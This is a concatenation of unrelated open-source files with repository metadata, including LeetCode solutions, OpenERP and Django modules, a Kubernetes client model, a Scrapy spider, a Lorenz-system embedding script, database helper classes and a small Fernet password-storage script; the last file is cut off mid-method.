d52dadc7c858dec5f454c2bdd7b914dc1e9870c5 | c90b3ac3e5ad11cb93d4e6b76b9b9c4a19d0f512 | /.history/copytest_20200502125750.py | 3f5f083b6c965e4eb030019b5d6986b066591552 | [] | no_license | rbafna6507/passwordstorageproject | 6465585e36c81075856af8d565fe83e358b4a40a | 480c30e358f7902ac0ef5c4e8d9556cb1d6d33f4 | refs/heads/master | 2022-11-25T12:05:02.625968 | 2020-07-27T21:33:38 | 2020-07-27T21:33:38 | 283,021,426 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 953 | py | import pickle
import cryptography
from cryptography.fernet import Fernet
"""def encrypt(message: bytes, key: bytes) -> bytes:
return Fernet(key).encrypt(message)
def decrypt(token: bytes, key: bytes) -> bytes:
return Fernet(key).decrypt(token)
"""
infile = open('jeff.pkl','rb')
z = pickle.load(infile)
key = Fernet.generate_key()
f = Fernet(key)
e_userpass = z
username = input(b"Username: ")
password = input(b"password: ")
website = input("Website: ")
e_username = f.encrypt(username)
e_password = f.encrypt(password)
e_list = [b"Username: " + e_username, b"Password: " + e_password]
e_userpass["Website: " + website] = e_list
outfile = open("jeff.pkl", "wb")
pickle.dump(e_userpass, outfile)
outfile.close()
infile = open('jeff.pkl','rb')
z = pickle.load(infile)
e_userpass = z
j = [e_userpass[k] for k in e_userpass]
for k in j:
for q in k:
decrypt(q)
"""for key, value in d_userpass.items():
print(key, ' : ', value)""" | [
"35872545+rbafna6507@users.noreply.github.com"
] | 35872545+rbafna6507@users.noreply.github.com |
ee82fb7cc4fd156f236ae8bafab57f23b8736e1b | 7b3711d4c6d7284255ba0270d49d120f984bf7c6 | /problems/549_binary_tree_longest_consecutive_sequence_ii.py | 9351f1ab9242d7c976ab632e31e3661c5bf978ce | [] | no_license | loganyu/leetcode | 2d336f30feb55379aaf8bf0273d00e11414e31df | 77c206305dd5cde0a249365ce7591a644effabfc | refs/heads/master | 2023-08-18T09:43:10.124687 | 2023-08-18T00:44:51 | 2023-08-18T00:44:51 | 177,875,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,748 | py | '''
Given a binary tree, you need to find the length of Longest Consecutive Path in Binary Tree.
Especially, this path can be either increasing or decreasing. For example, [1,2,3,4] and [4,3,2,1] are both considered valid, but the path [1,2,4,3] is not valid. On the other hand, the path can be in the child-Parent-child order, where not necessarily be parent-child order.
Example 1:
Input:
1
/ \
2 3
Output: 2
Explanation: The longest consecutive path is [1, 2] or [2, 1].
Example 2:
Input:
2
/ \
1 3
Output: 3
Explanation: The longest consecutive path is [1, 2, 3] or [3, 2, 1].
Note: All the values of tree nodes are in the range of [-1e7, 1e7].
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def longestConsecutive(self, root: TreeNode) -> int:
self.max = 0
self.longest_path(root)
return self.max
def longest_path(self, node):
if not node:
return (0, 0)
inr = dcr = 1
if node.left:
l = self.longest_path(node.left)
if node.val == node.left.val + 1:
dcr = l[1] + 1
elif node.val == node.left.val - 1:
inr = l[0] + 1
if node.right:
r = self.longest_path(node.right)
if node.val == node.right.val + 1:
dcr = max(dcr, r[1] + 1)
elif node.val == node.right.val - 1:
inr = max(inr, r[0] + 1)
self.max = max(self.max, dcr + inr - 1)
return (inr, dcr)
| [
"logan.yu@cadre.com"
] | logan.yu@cadre.com |
39490c4724d2b3f930595661177772125731acc9 | ab79f8297105a7d412303a8b33eaa25038f38c0b | /education/school_transport/wizard/transfer_vehicle.py | 6d509565898bbd75f1f7b57dd95cfd567302c7c2 | [] | no_license | adahra/addons | 41a23cbea1e35079f7a9864ade3c32851ee2fb09 | c5a5678379649ccdf57a9d55b09b30436428b430 | refs/heads/master | 2022-06-17T21:22:22.306787 | 2020-05-15T10:51:14 | 2020-05-15T10:51:14 | 264,167,002 | 1 | 0 | null | 2020-05-15T10:39:26 | 2020-05-15T10:39:26 | null | UTF-8 | Python | false | false | 4,425 | py | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
# Copyright (C) 2011-2012 Serpent Consulting Services (<http://www.serpentcs.com>)
# Copyright (C) 2013-2014 Serpent Consulting Services (<http://www.serpentcs.com>)
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
class transfer_vehicle(osv.TransientModel):
_name = "transfer.vehicle"
_description = "transfer vehicle"
_columns = {
'name':fields.many2one('student.student','Student Name', readonly=True),
'participation_id':fields.many2one('transport.participant','Participation', required=True),
'root_id':fields.many2one('student.transport','Root', required=True),
'old_vehicle_id':fields.many2one('transport.vehicle','Old Vehicle No', required=True),
'new_vehicle_id':fields.many2one('transport.vehicle','New Vehicle No', required=True),
}
def default_get(self, cr, uid, fields, context=None):
if context is None:
context = {}
result = super(transfer_vehicle, self).default_get(cr, uid, fields, context=context)
if context.get('active_id'):
student = self.pool.get('student.student').browse(cr, uid, context.get('active_id'), context=context)
if 'name' in fields:
result.update({'name': student.id})
return result
def onchange_participation_id(self, cr, uid, ids, transport, context=None):
if not transport:
return {}
transport_obj = self.pool.get('transport.participant').browse(cr, uid, transport, context)
return {'value': {'root_id': transport_obj.transport_id.id, 'old_vehicle_id': transport_obj.vehicle_id.id}}
def vehicle_transfer(self, cr, uid, ids, context=None):
stu_prt_obj = self.pool.get('transport.participant')
vehi_obj = self.pool.get('transport.vehicle')
for new_data in self.browse(cr, uid, ids, context=context):
vehi_data = vehi_obj.browse(cr, uid, new_data.old_vehicle_id.id, context=context)
vehi_new_data = vehi_obj.browse(cr, uid, new_data.new_vehicle_id.id, context=context)
#check for transfer in same vehicle
if new_data.old_vehicle_id.id == new_data.new_vehicle_id.id:
raise osv.except_osv(_('Error !'),_('Sorry you can not transfer in same vehicle.'))
# First Check Is there vacancy or not
person = int(vehi_data.participant) + 1
if vehi_data.capacity < person:
raise osv.except_osv(_('Error !'),_('There is No More vacancy on this vehicle.'))
#remove entry of participant in old vehicle.
participants = [prt_id.id for prt_id in vehi_data.vehi_participants_ids]
participants.remove(new_data.participation_id.id)
vehi_obj.write(cr, uid, new_data.old_vehicle_id.id, {'vehi_participants_ids':[(6,0,participants)]}, context=context)
#entry of participant in new vehicle.
participants = [prt_id.id for prt_id in vehi_new_data.vehi_participants_ids]
participants.append(new_data.participation_id.id)
vehi_obj.write(cr, uid, new_data.new_vehicle_id.id, {'vehi_participants_ids':[(6,0,participants)]}, context=context)
stu_prt_obj.write(cr, uid, new_data.participation_id.id, {'vehicle_id': new_data.new_vehicle_id.id,}, context=context)
return {}
transfer_vehicle()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| [
"prog1@381544ba-743e-41a5-bf0d-221725b9d5af"
] | prog1@381544ba-743e-41a5-bf0d-221725b9d5af |
990dbb97b825729a03f9e35c2c4534b21c1a05e4 | 2a171178942a19afe9891c2425dce208ae04348b | /kubernetes/client/models/v1alpha1_certificate_signing_request_status.py | 7d4e56624b8742735902dccd5ab749de8d607509 | [
"Apache-2.0"
] | permissive | ouccema/client-python | ac3f1dee1c5ad8d82f15aeecb87a2f5f219ca4f4 | d7f33ec53e302e66674df581904a3c5b1fcf3945 | refs/heads/master | 2021-01-12T03:17:54.274888 | 2017-01-03T22:13:14 | 2017-01-03T22:13:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,830 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.5.0-snapshot
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from pprint import pformat
from six import iteritems
import re
class V1alpha1CertificateSigningRequestStatus(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, certificate=None, conditions=None):
"""
V1alpha1CertificateSigningRequestStatus - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'certificate': 'str',
'conditions': 'list[V1alpha1CertificateSigningRequestCondition]'
}
self.attribute_map = {
'certificate': 'certificate',
'conditions': 'conditions'
}
self._certificate = certificate
self._conditions = conditions
@property
def certificate(self):
"""
Gets the certificate of this V1alpha1CertificateSigningRequestStatus.
If request was approved, the controller will place the issued certificate here.
:return: The certificate of this V1alpha1CertificateSigningRequestStatus.
:rtype: str
"""
return self._certificate
@certificate.setter
def certificate(self, certificate):
"""
Sets the certificate of this V1alpha1CertificateSigningRequestStatus.
If request was approved, the controller will place the issued certificate here.
:param certificate: The certificate of this V1alpha1CertificateSigningRequestStatus.
:type: str
"""
self._certificate = certificate
@property
def conditions(self):
"""
Gets the conditions of this V1alpha1CertificateSigningRequestStatus.
Conditions applied to the request, such as approval or denial.
:return: The conditions of this V1alpha1CertificateSigningRequestStatus.
:rtype: list[V1alpha1CertificateSigningRequestCondition]
"""
return self._conditions
@conditions.setter
def conditions(self, conditions):
"""
Sets the conditions of this V1alpha1CertificateSigningRequestStatus.
Conditions applied to the request, such as approval or denial.
:param conditions: The conditions of this V1alpha1CertificateSigningRequestStatus.
:type: list[V1alpha1CertificateSigningRequestCondition]
"""
self._conditions = conditions
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"mehdy@google.com"
] | mehdy@google.com |
c4e9f6e335fa168175f5e5b8bf42d3dcdb16c8d4 | b59e093876a78054bf58ae16fa245bace5d924a2 | /maxWidthRamp.py | fb91dfb4aae2584c36dc9a7c834098301dea7ae2 | [] | no_license | NeilWangziyu/Leetcode_py | 539551585413e1eebd6e6175ba3105c6bc17e943 | 4105e18050b15fc0409c75353ad31be17187dd34 | refs/heads/master | 2020-04-08T03:50:05.904466 | 2019-10-15T07:13:49 | 2019-10-15T07:13:49 | 158,991,828 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,746 | py | class Solution(object):
def maxWidthRamp(self, A):
"""
:type A: List[int]
:rtype: int
"""
if not A:
return 0
if len(A) < 2:
return 0
res = 0
for i in range(len(A)):
for j in range(i+1, len(A)):
if A[i] <= A[j]:
res = max(res, j-i)
return res
def maxWidthRamp2(self, A):
if not A:
return 0
if len(A) < 2:
return 0
A_list = sorted(range(len(A)), key=lambda x:A[x])
last = len(A)
res = 0
for each in A_list:
if each < last:
last = each
else:
res = max(res, each - last)
return res
def maxWidthRamp3(self, A):
"""
:type A: List[int]
:rtype: int
"""
re = 0
stack = []
for i in range(len(A)):
if len(stack) == 0 or A[stack[-1]] > A[i]: # 防止下标越界,不用A[i]>A[i+1}
print(A[i])
stack.append(i) # stack中存放下标 ,按值升序
print(stack)
for j in range(len(A) - 1, re - 1, -1): # 最大堆的左端肯定在单调栈内
print(j, stack)
while stack and A[stack[-1]] <= A[j]:
k = j - stack.pop() # 对于栈顶元素来说不可能有更大值, 因此pop出
re = max(re, k) # 找到每个单调递增堆中元素的最大宽度坡,max即为整个数组最终结果
return re
s = Solution()
A = [6,0,8,2,1,5]
# print(s.maxWidthRamp2(A))
print(s.maxWidthRamp3(A))
A = [9,8,1,0,1,9,4,0,4,1]
# print(s.maxWidthRamp2(A))
print(s.maxWidthRamp3(A))
| [
"noreply@github.com"
] | NeilWangziyu.noreply@github.com |
049cb528754542f06ea9fb36b875d4720677fdeb | 5de14b0e96e17822aafdd0658aef846693db2786 | /app/core/tests/tests_admin.py | fbce74a7b8516edecfa5f3236de2aa61dfbd05bd | [
"MIT"
] | permissive | mahinm20/recipe-app-api | 392a6cec214d54522cd7ebbb21bb4a443ab8d6ef | f9d6c69ae71cdd3c265f50b503cb027c6cb307a9 | refs/heads/master | 2022-10-05T01:03:19.799872 | 2020-06-07T21:25:05 | 2020-06-07T21:25:05 | 264,731,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,279 | py | from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email = 'mahinmalhotra20@gmail.com',
password = 'mala2028'
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email = 'testing@alala.com',
password = 'password123',
name = 'Frank Costanza',
)
def test_users_listed(self):
"""Test that users are listed on the user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_page_change(self):
"""Test that the user edit page works"""
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
"""Test that the create user page works"""
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
#
# from django.test import TestCase
# from django.contrib.auth import get_user_model
# from django.urls import reverse
# from django.test import Client
#
#
# class AdminSiteTests(TestCase):
#
# def setUp(self):
# self.client = Client()
# self.admin_user = get_user_model().objects.create_superuser(
# email='admin@londonappdev.com',
# password='password123'
# )
# self.client.force_login(self.admin_user)
# self.user = get_user_model().objects.create_user(
# email='test@londonappdev.com',
# password='password123',
# name='Test User Full Name',
# )
#
# def test_users_listed(self):
# """Test that users are listed on the user page"""
# url = reverse('admin:core_user_changelist')
# res = self.client.get(url)
#
# self.assertContains(res, self.user.name)
# self.assertContains(res, self.user.email)
| [
"mahinmalhotra20@gmail.com"
] | mahinmalhotra20@gmail.com |
486f1f5d15eb52bf0fc58132dc6ea64812ba691a | d274e22b1cc5d546855fe46b089b13cfe2f4047c | /september2020/solutions/day03_RepeatedSubstringPattern.py | bb4d713142470f406a4f140eab73257325d2f299 | [] | no_license | varunkumar032/lockdown-leetcode | ca6b7a8133033110680dd226c897dd8a1482682b | 15a72a53be9005eca816f018cb1b244f2aa4cdfb | refs/heads/master | 2023-06-30T08:31:54.323747 | 2021-07-12T11:29:59 | 2021-07-12T11:29:59 | 260,616,280 | 0 | 0 | null | 2021-05-06T10:24:48 | 2020-05-02T04:52:37 | Python | UTF-8 | Python | false | false | 728 | py | # Given a non-empty string check if it can be constructed by taking a substring of it and
# appending multiple copies of the substring together.
# You may assume the given string consists of lowercase English letters only and its length
# will not exceed 10000.
# Example 1:
# Input: "abab"
# Output: True
# Explanation: It's the substring "ab" twice.
# Example 2:
# Input: "aba"
# Output: False
# Example 3:
# Input: "abcabcabcabc"
# Output: True
# Explanation: It's the substring "abc" four times. (And the substring "abcabc" twice.)
def repeatedSubstringPattern(s):
for i in range(len(s)//2):
substring = s[:i+1]
if len(s)%len(substring)==0 and substring*(len(s)//len(substring))==s:
return True
return False
| [
"varunkumar032@gmail.com"
] | varunkumar032@gmail.com |
588a8a5be895bf8a6ad7215fca32c5d78ead3cf1 | 7202b4cf562fcacf2f684c1985b448b5780c4967 | /alds1/05d.py | c2600d1dd7eb418017cba2b350db2a0f9c426f45 | [] | no_license | mskt4440/AOJ | ce523182dbd75e85c1bba43d7d23217711b8e617 | f6d9ca36e77a88ed9ddbeb53340a745bf8cac157 | refs/heads/master | 2021-07-07T00:34:23.034606 | 2020-09-24T02:25:43 | 2020-09-24T02:25:43 | 188,768,314 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 829 | py | #
# alds1 05d
#
def merge(A, left, mid, right):
count = 0
L = A[left:mid]
R = A[mid:right]
L.append(1000000001)
R.append(1000000001)
i, j = 0, 0
for k in range(left, right):
if L[i] <= R[j]:
A[k] = L[i]
i += 1
else:
A[k] = R[j]
j += 1
if L[i] != 1000000001:
count += mid + j - k - 1
return count
def mergesort(A, left, right):
if left + 1 < right:
mid = (left + right) // 2
countL = mergesort(A, left, mid)
countR = mergesort(A, mid, right)
return merge(A, left, mid, right) + countL + countR
return 0
def main():
n = int(input())
A = list(map(int, input().split()))
ans = mergesort(A, 0, n)
print(ans)
if __name__ == '__main__':
main()
| [
"mskt4440@gmail.com"
] | mskt4440@gmail.com |
8762b8e7d197c08bf7bf83f303877557b9522988 | f50f1aa1f8f139d546db3230a1cb1f53043fd9e6 | /util/admin/utempter/actions.py | 8c7613e8e50b84e6a3887ce3173972ecb7f86f3e | [] | no_license | pars-linux/corporate2 | 7887961d1552d39bc3b0bef4a60fd3413d9b82bb | 14d1eacfc824fb8d0bff8173e7ac06b36b88d10d | refs/heads/master | 2020-05-26T15:02:12.005654 | 2017-02-27T03:07:14 | 2017-02-27T03:07:14 | 82,476,084 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2005 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def build():
shelltools.export("LDFLAGS", "%s -Wl,-z,now" % get.LDFLAGS())
autotools.make('RPM_OPT_FLAGS="%s"' % get.CFLAGS())
def install():
autotools.rawInstall('RPM_BUILD_ROOT="%s" LIBDIR=/usr/lib' % get.installDIR())
pisitools.dobin("utmp")
| [
"eki@420bcd57-4a62-4fd6-832e-5ede16c90cc9"
] | eki@420bcd57-4a62-4fd6-832e-5ede16c90cc9 |
84090d40ff2316d42b863fad8d472445fab799f6 | 1dca0675aa9c56bc13d2423362e21914c9426cfa | /web_29_jul_dev_8220/wsgi.py | e17ecdf2603d683b1472cb55c3f5b29a649233af | [] | no_license | crowdbotics-apps/web-29-jul-dev-8220 | 9c5a1ba90482dde61d8ec4f0e6ba9bc8f28b71cb | 5583b4280a97c8269a36265bf56c27c3c6515e54 | refs/heads/master | 2022-11-29T05:14:25.319284 | 2020-07-29T05:09:48 | 2020-07-29T05:09:48 | 283,399,990 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 415 | py | """
WSGI config for web_29_jul_dev_8220 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "web_29_jul_dev_8220.settings")
application = get_wsgi_application()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
06b9b4cd93422773c9648fa9e62d931e63211375 | 357b233baba79125936def2065cdb7d20008b06e | /scraper/spiders/bilkent_turkish_writings.py | e3f4f5788e139e2e565a4f9229211db4945f1685 | [] | no_license | selimfirat/bilkent-turkish-writings-dataset | 00e7bf8d83f21ce54705022887ad49ab54e8fbcd | be662fd50987a653071af0673e1247fb4c4ce7ed | refs/heads/master | 2021-05-08T14:33:35.472323 | 2018-02-04T15:59:27 | 2018-02-04T15:59:27 | 120,089,498 | 41 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,038 | py | import scrapy
from scrapy import Request
from scrapy.linkextractors.lxmlhtml import LxmlLinkExtractor
from writing_entry import WritingEntry
class BilkentTurkishWritingsSpider(scrapy.Spider):
name = "bilkent_turkish_writings"
custom_settings = {
"ITEM_PIPELINES": {
'scrapy.pipelines.files.FilesPipeline': 100
},
"DOWNLOAD_DELAY": 0.25,
"FILES_STORE": '../data/'
}
start_urls = ["https://stars.bilkent.edu.tr/turkce/"]
allowed_domains = ['stars.bilkent.edu.tr']
def __init__(self, *args, **kwargs):
super(BilkentTurkishWritingsSpider, self).__init__(*args, **kwargs)
def parse(self, response):
print('Parsing '+response.url)
file_urls = []
for link in LxmlLinkExtractor(allow=self.allowed_domains).extract_links(response):
if "ogrenciNo" in link.url:
file_urls.append(link.url)
else:
yield Request(link.url, self.parse)
yield WritingEntry(file_urls=file_urls)
| [
"yilmazselimfirat@gmail.com"
] | yilmazselimfirat@gmail.com |
4eb07103153cd420fa53c7b6c7e7f84d5bc4c189 | 9cfdc1373b59b92121a0a4ab795a395ac8440fbf | /python/false_nearest_neighbours.py | c5ca028d352032a8575fd13ac8e1c99f4829885b | [] | no_license | physycom/metnum | ae1da308ba333dd036dea46319c45c2ba81bd1ca | cb114bb49062f9a9ec165e294a05b24663c60f17 | refs/heads/master | 2023-04-01T07:30:21.122348 | 2023-03-22T16:06:27 | 2023-03-22T16:06:27 | 34,463,378 | 4 | 6 | null | 2018-03-23T21:59:19 | 2015-04-23T15:04:48 | C++ | UTF-8 | Python | false | false | 2,205 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 19 22:30:58 2018
@author: NICO
"""
import numpy as np
import matplotlib.pylab as plt
import scipy
dt = .01
it = 10000
sigma = 16.
b = 4.
r = 45.92
x, y, z = np.empty(shape=(it)), np.empty(shape=(it)), np.empty(shape=(it))
x[0], y[0], z[0] = 10, 1, 1
Vx = lambda x, y, sigma : sigma*(y-x)
Vy = lambda x, y, z, r : -x*z + r*x - y
Vz = lambda x, y, z, b : -b*z + x*y
for i in range(0, it-1):
x[i+1] = x[i] + dt*Vx(x[i], y[i], sigma)
y[i+1] = y[i] + dt*Vy(x[i], y[i], z[i], r)
z[i+1] = z[i] + dt*Vz(x[i], y[i], z[i], b)
# False Nearest Neighbours
RT = 15
AT = 2
sigmay = np.std(x)
maxEmbDim = 10
delay= 1
rEEM = it - (maxEmbDim*delay - delay)
EEM = np.concatenate([y[delay*maxEmbDim-delay:].reshape(1, len(y[delay*maxEmbDim-delay:])),
[y[delay*maxEmbDim-(i+1)*delay:-i*delay] for i in range(1, maxEmbDim)]
], axis=0).T
Ind1 = np.empty(maxEmbDim)
Ind2 = np.empty(maxEmbDim)
embedm = 0 # only for plot
for k in range(1, maxEmbDim+1):
D = scipy.spatial.distance.squareform(scipy.spatial.distance.pdist(EEM[:, :k], "euclidean"))
np.fill_diagonal(a=D, val=np.inf)
l = np.argmin(D[:rEEM - maxEmbDim - k, :], axis=1)
fnn1 = np.asarray([abs(y[i + maxEmbDim + k - 1]-y[li + maxEmbDim + k - 1])/D[i, li] for i,li in enumerate(l) if D[i, li] > 0 and li + maxEmbDim + k - 1 < it])
fnn2 = np.asarray([abs(y[i + maxEmbDim + k - 1]-y[li + maxEmbDim + k - 1])/sigmay for i,li in enumerate(l) if D[i, li] > 0 and li + maxEmbDim + k - 1 < it])
Ind1[k-1] = len(np.where(np.asarray(fnn1) > RT)[0])
Ind2[k-1] = len(np.where(np.asarray(fnn2) > AT)[0])
if embedm == 0: # only for plot
if Ind1[k-1] / len(fnn1) < .1 and Ind2[-1] / len(fnn1) < .1 and Ind1[k-1] != 0:
embedm = k
#break # uncomment for true algorithm
fig, ax = plt.subplots(nrows=1, ncols=1, figsize=(8,8))
ax.plot(np.arange(0, maxEmbDim), Ind1)
ax.set_xlabel('Embedding dimension', fontsize=14)
ax.set_ylabel('% FNN', fontsize=14)
ax.set_title('Optimal Embedding Dimension with FNN', fontsize=16)
ax.plot(embedm, Ind1[embedm], 'r.')
plt.text(embedm, Ind1[embedm] + 100, "EmbDim = $%d$"%(embedm))
| [
"nico.curti2@unibo.it"
] | nico.curti2@unibo.it |
9e5a7e72a9833ec32ef8a92895d30c8b3d688938 | 66b2bccf07754119b9eed320d9f7715fa52f6d44 | /scrapy_learn1/utils/dbbaseutil.py | 2c512ebc43bf825ae27711e81ddf171a5572ea7b | [] | no_license | wangsanshi123/scrapy_learn1 | 678c3708e3765ab26cff8799a55d0153abe9da55 | 16bf80a634484842e9b66db9138c2f4c8769d087 | refs/heads/master | 2020-03-08T07:42:56.260798 | 2018-04-04T03:26:58 | 2018-04-04T03:26:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,566 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import warnings
import sqlite3
import pymysql
warnings.filterwarnings('ignore')
__author__ = 'yangsheng'
class DBUtil(object):
def __init__(self, dbpath):
self._dbpath = dbpath
self._conn = sqlite3.connect(self._dbpath)
def cursor_execute_one(self, sql):
'''查询结果,逐行读取,yield模式'''
cursor = self._conn.cursor()
cursor.execute(sql)
hasnext = True
while hasnext:
data = cursor.fetchone()
if data:
yield data
else:
hasnext = False
def cursor_execute(self, sql):
cursor = self._conn.cursor()
cursor.execute(sql)
datas = cursor.fetchall()
cursor.close()
return datas
def cursor_execute_nosearch(self, sql, comm=False, datas=None):
'''
执行sql语句,非查询,没有返回
:param sql: sql语句
:param comm: 是否commit
:param datas
:return:
'''
cursor = self._conn.cursor()
if datas:
cursor.execute(sql, datas)
else:
cursor.execute(sql)
if comm:
self._conn.commit()
def commit(self):
'''
提交之前发生的更新操作
:return:
'''
self._conn.commit()
class MysqlUtil(object):
def __init__(self, dbhost, dbport, dbname, dbuser, dbpwd, charset='utf8'):
self.dbhost = dbhost
self.dbport = dbport
self.dbname = dbname
self.dbuser = dbuser
self.dbpwd = dbpwd
self.charset = charset
self._conn = pymysql.connect(host=dbhost, port=dbport, db=dbname,
user=dbuser, passwd=dbpwd, charset=charset)
def cursor_execute_nosearch(self, sql, comm=False):
'''
执行sql语句,非查询,没有返回
:param sql: sql语句
:param comm: 是否commit
:return:
'''
cursor = self._conn.cursor()
cursor.execute(sql)
cursor.close()
if comm:
self._conn.commit()
def cursor_execute(self, sql):
cursor = self._conn.cursor()
cursor.execute(sql)
dataset = cursor.fetchall()
cursor.close()
return dataset
def commit(self):
self._conn.commit()
def close(self):
self._conn.close()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
| [
"118319592@qq.com"
] | 118319592@qq.com |
b751373ce90366b0f78e58e0b5902ed2dfc9ceb2 | 69d8a912212c1355470c298ac4f2fb716aed9982 | /proyecto/adopcion/models.py | 1f6b436c1ecfcf697d872172f1543322344ffd27 | [] | no_license | juampiludu/almanimal | b7fa92cb34cd8b908ef609036fb647fd1ca328a7 | 033037823252a13fd20514c226dd100837fdc610 | refs/heads/master | 2023-01-20T17:46:57.671217 | 2020-12-02T04:05:03 | 2020-12-02T04:05:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,022 | py | from django.db import models
from django.contrib.auth.models import User
from django.utils.html import mark_safe
from django.templatetags.static import static
# Create your models here.
class Animal(models.Model):
class Sexo(models.TextChoices):
MACHO = 'Macho'
HEMBRA = 'Hembra'
INDEFINIDO = 'Indefinido'
class Tamaño(models.TextChoices):
GRANDE = 'Grande'
MEDIANO = 'Mediano'
CHICO = 'Chico'
class TipoAnimal(models.TextChoices):
PERRO = 'Perro'
GATO = 'Gato'
OTRO = 'Otro'
class Tiempo(models.TextChoices):
DIAS = 'Días'
SEMANAS = 'Semanas'
MESES = 'Meses'
AÑOS = 'Años'
class Meta:
verbose_name = 'Animal'
verbose_name_plural = 'Animales'
def __str__(self):
return self.nombre
dueño = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name='Creador', limit_choices_to={'is_staff':True})
nombre = models.CharField(verbose_name='Nombre', max_length=255, null=False, blank=False)
tipo_animal = models.CharField(verbose_name='Tipo de animal', max_length=40, choices=TipoAnimal.choices, null=False, blank=False)
raza = models.CharField(verbose_name='Raza', max_length=255, null=False, blank=False)
tamaño = models.CharField(verbose_name='Tamaño', max_length=40, choices=Tamaño.choices, null=False, blank=False)
foto1 = models.ImageField(verbose_name="Foto 1", blank=True, null=True, upload_to='foto1')
foto2 = models.ImageField(verbose_name="Foto 2", blank=True, null=True, upload_to='foto2')
edad = models.IntegerField(verbose_name='Edad', null=False, blank=False)
tiempo = models.CharField("Tiempo", max_length=50, choices=Tiempo.choices, null=False, blank=False)
sexo = models.CharField(verbose_name='Sexo', max_length=40, choices=Sexo.choices, null=False, blank=False)
descripcion = models.TextField(verbose_name='Descripcion', null=False, blank=False)
caracter = models.TextField(verbose_name='Carácter', null=True, blank=True)
vacunado = models.BooleanField(verbose_name='Vacunado', null=False, blank=False)
desparasitado = models.BooleanField(verbose_name='Desparasitado', null=False, blank=False)
castrado = models.BooleanField(verbose_name='Castrado', null=False, blank=False)
comentario = models.TextField(verbose_name='Comentarios', null=True, blank=True)
telefono = models.CharField("Teléfono de contacto", max_length=50)
email = models.EmailField("Email de contacto", max_length=254)
publicado = models.BooleanField(verbose_name='Publicado', default=False)
creado = models.DateTimeField(auto_now_add=True, verbose_name='Fecha de creación')
actualizado = models.DateTimeField(auto_now=True,verbose_name='Ultima actualización')
def image_tag(self):
